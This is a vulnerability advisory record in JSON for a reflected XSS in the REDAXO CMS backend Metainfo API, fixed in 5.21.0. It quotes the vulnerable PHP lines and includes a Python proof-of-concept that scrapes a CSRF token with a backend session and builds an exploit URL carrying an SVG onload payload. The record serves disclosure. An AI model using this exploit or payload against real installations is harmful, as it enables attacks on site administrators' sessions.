{"id":"GHSA-m662-8jrj-cw6v","aliases":[],"url":"https://o3.security/vulnerability/GHSA-m662-8jrj-cw6v","summary":"REDAXO has reflected XSS in backend Metainfo API via type parameter (CSRF token required)","details":"### Summary\n\nA **reflected XSS** vulnerability has been identified in the REDAXO backend. The `type` parameter is concatenated into an API error message and rendered without HTML escaping.\n\n---\n\n### Details\n\n**Root cause**  \nUser input `type` is injected into an exception message, then rendered by `rex_view::error()` which delegates to `rex_view::message()` without HTML escaping.\n\n**Vulnerable code (`redaxo/src/addons/metainfo/lib/handler/api_default_fields.php`) :**\n```php\n$type = rex_get('type', 'string');\nthrow new rex_api_exception(sprintf('metainfo type \"%s\" does not have default field.', $type));\n```\n\n**Sink (`redaxo/src/core/lib/view.php`) :**\n```php\nreturn '<div class=\"' . $cssClassMessage . '\">' . $message . '</div>';\n```\n\n**Data flow source -> sink**\n- Source : `type` (GET)\n- Propagation : concatenated into the exception message\n- Sink : rendered via `rex_view::error()` -> `rex_view::message()` without escaping\n\n**Authentication required :** yes (backend session)\n\n---\n\n### PoC -  exploit\n\n```python\n#!/usr/bin/env python3\nimport re\nimport urllib.parse\nimport requests\n\nTARGET_URL = \"http://poc.local/\"\nBACKEND_PATH = \"redaxo/index.php\"\nSESSION_ID = \"xxxxxxxxxxxxxxxxxxxxx\"\nVERIFY_SSL = False\nTIMEOUT = 15\n\nPAYLOAD = '\\\"><svg/onload=alert(\"pwned\")>'\n\n\ndef build_backend_url() -> str:\n    base = TARGET_URL.rstrip(\"/\")\n    return f\"{base}/{BACKEND_PATH.lstrip('/')}\"\n\n\ndef extract_api_csrf(html_text: str) -> str:\n    m = re.search(r'rex-api-call=metainfo_default_fields_create[^\"\\']+', html_text)\n    if not m:\n        raise RuntimeError(\"Could not find the metainfo_default_fields_create API link in the page HTML.\")\n    fragment = m.group(0).replace(\"&amp;\", \"&\")\n    token_match = re.search(r\"_csrf_token=([^&]+)\", fragment)\n    if not token_match:\n        raise RuntimeError(\"CSRF token for metainfo_default_fields_create was not found in the extracted link.\")\n    return token_match.group(1)\n\ndef set_session_cookie(session: requests.Session) -> None:\n    parsed = urllib.parse.urlparse(TARGET_URL)\n    if parsed.hostname:\n        session.cookies.set(\"PHPSESSID\", SESSION_ID, domain=parsed.hostname, path=\"/\")\n\n\ndef main() -> None:\n    backend_url = build_backend_url()\n\n    s = requests.Session()\n    set_session_cookie(s)\n\n    # Admin backend session required\n    r0 = s.get(backend_url, timeout=TIMEOUT, verify=VERIFY_SSL)\n    if \"rex-page-login\" in r0.text or \"rex_user_login\" in r0.text:\n        print(\"[!] Invalid/expired PHPSESSID. Update SESSION_ID with a valid backend session.\")\n        return\n\n    r = s.get(backend_url, params={\"page\": \"metainfo/articles\"}, timeout=TIMEOUT, verify=VERIFY_SSL)\n    if r.status_code != 200:\n        print(f\"[!] Failed to access metainfo page (HTTP {r.status_code}).\")\n        return\n\n    api_token = extract_api_csrf(r.text)\n\n    params = {\n        \"page\": \"metainfo/articles\",\n        \"rex-api-call\": \"metainfo_default_fields_create\",\n        \"type\": PAYLOAD,\n        \"_csrf_token\": api_token,\n    }\n\n    exploit_url = f\"{backend_url}?{urllib.parse.urlencode(params)}\"\n    print(exploit_url)\n\n\nif __name__ == \"__main__\":\n    main()\n\n```\n\nThe script uses only the provided PHPSESSID, retrieves the CSRF token from the metainfo page, and prints a ready-to-use exploit link.\n\n---\n\n### Impact\n\n- **Confidentiality :** Low : no direct session theft (HttpOnly cookies), but possibility to access/exfiltrate data available via the DOM or via same-origin requests if the XSS executes in a victim’s session.\n- **Integrity :** Low : possibility to chain backend actions on behalf of the user (same-origin requests) only if execution takes place in a victim session; otherwise the impact is limited to the user who triggers the call.\n- **Availability :** Low : the XSS could disrupt the administration interface or trigger unwanted actions, but the token requirement strongly limits realistic scenarios.\n\n### Video \n\nhttps://github.com/user-attachments/assets/251f548c-3f68-483b-a012-b8fc28493a83","published":"2026-04-10T19:40:23Z","modified":"2026-04-10T19:49:11.559366Z","cvss":null,"epss":null,"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"Packagist","name":"redaxo/source","fixedVersion":"5.21.0"}],"fix":null,"references":[{"type":"WEB","url":"https://github.com/redaxo/core/security/advisories/GHSA-m662-8jrj-cw6v"},{"type":"PACKAGE","url":"https://github.com/redaxo/core"},{"type":"WEB","url":"https://github.com/redaxo/core/releases/tag/5.21.0"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-04-10T19:49:11.559366Z"}}